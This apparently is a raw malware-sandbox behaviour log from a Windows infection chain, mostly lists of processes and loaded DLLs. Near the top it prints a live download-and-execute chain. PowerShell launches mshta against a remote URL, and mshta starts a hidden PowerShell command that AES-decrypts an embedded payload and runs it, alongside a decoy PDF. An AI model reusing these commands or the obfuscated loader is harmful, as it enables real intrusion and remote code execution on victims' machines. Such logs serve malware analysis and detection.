Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2072 --field-trial-handle=1632,i,8924348424998603111,1472651231245684160,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://evanbconsultancy.com/Sand/Buddy"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://evanbconsultancy.com/Sand/BuddyJump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '3A0550E6F02FF19F0D7D65ABA4322B948E6128C005B35A41C185638A3B71C4B033F6793763A141FC2DF5F78A32CFE93FB3F106BBC73BC0347EB5117739EA6BCDC712DC4913AC95B231C44FD0E7658E3CB70005CF09FB0595EA559B76132DAEB0D282BEEA68B55E7A9BA44EF8B45601264C8696BD55528EF1B9DD98948B27EC7AB79A994DCE5DC246101471E8511E44683A6A4FE675F17184B0F45DD710B0F3E934D3E87202452FBA857892530000F7A72AA942B3A7D215E363C31E439657BB692997478E7649840E3437D9791C71EE2B525FFBC5C786EA290EE8548D38794A4901D3E34E39A178B30A8BCB2E9F77F8824F798590E894BAA701C583A6EE6499D5DF0288032084FF43FA83E2C5C6512028F2396510D21950EF4F2FB6318F3A83552C75935D4092DEB0C6B32CB3A99F0963415214D188C9BA0BF5D41A7805B5D549104E9B78022BF15FA2D7048395767284235F5312081A7124F018F4E91EACDBCCF751A9F28FF37CAF076B6690F025C400C18E2BD9E1A7BD3ED7F7A96C28C15F00B93909DF3C243E431A52E02F105C946283D2D013B71935B51194D17B7BA6983861748E298038CEAD85ED1B369523E084E49C8D30900FE651D1CA9CE4AEBC5CA07121E32BED105B864D5F70953DD58446FBAF635CA7BFB75757279A3990FB975F4A6CA8319BCBB285862375238FD471009713449C2B5759EB614AB609037130BDD0DF5A80E11753BF15D370D14D9457E1A29A143C2993ABCEFC9EBB18A41FD7F01477B69689096D79B0C830798EE3FDD6CCAA115FED76DA4C183FA9145AE9365194967DBD487693C4F977EE4623572CD65340F824D903A9BEE74E567BA2A59D6049158CA16BAF1E740DCFF074D5B76ACD69BD6E62C8FFE8ACB399E025061A2791DCAC39AD53DA9B95EBE3B0E8F162CEDA33CA00F31C9EE377C87715D2EB5D1329BBA8D59E15DE0E867D91D45FCE6A1C1E307F17C1C44415AC23730598729B5AF81791F4BD7DD68D59E5463C9A238BF8BA3D80F58D15CBCBD76A2244C6935E83F51AEB529749508568CDB60F284E5D4320EF0CF1DB2FBEC894A24FF83258219EC3A042E9EA4B7B09A2D6BBF3BA837EF69734C94330CC4312719B08A8D97BED4CA520D35A041F982D71D75204AAE0EA20B8D73572E4BFF0EB5AC4F25EA4DB8C036BC8EABC00D579CC10384D09ABD62B02E86C3A1C7F8C862DE3364811CAB68EB1786B7786BC5725D3493F05A15EAEEE2EE6686D91A9B01CBD4C7885E2B196DAB3663650F11D71EEEDB96A2AAF3442EF119D05205B47F44D7200C81C465F54C21EBC99FF2B96579620097C613B589DD515E8CB8F3230A889E2C6385042EE85D8032B14D1F7031C085BA84F4AF0C953A0070931BB3147C2D40EA5E24309522AE090CC33FD5B9A998F2F88D262EBF6918701F47BB35F236B9AD77BEC3181393A4E03153A5F978106133C121B91E124075B26668FA32D6D38C829EF61BA386E20E210F9B2F8550F9D7F0472F77303A216FA96285E529D264EF798AC3EE226E25F6E9FD15A30A8B1993A229685BC002198BE999C694C7545467374416D7458766A525558';function slF ($bNBDb){return -split ($bNBDb -replace '..', '0x$& ')};$rzZJRI = slF($ddg.SubString(0, 2208));$qvt = [System.Security.Cryptography.Aes]::Create();$qvt.Key = slF($ddg.SubString(2208));$qvt.IV = New-Object byte[] 16;$yPsRN = $qvt.CreateDecryptor();$qVJApxuJ = [System.String]::new($yPsRN.TransformFinalBlock($rzZJRI, 0,$rzZJRI.Length)); sal fd $qVJApxuJ.Substring(3,3); fd $qVJApxuJ.Substring(6)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Company%20Information.pdf"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2072 --field-trial-handle=1632,i,8924348424998603111,1472651231245684160,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: imgutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
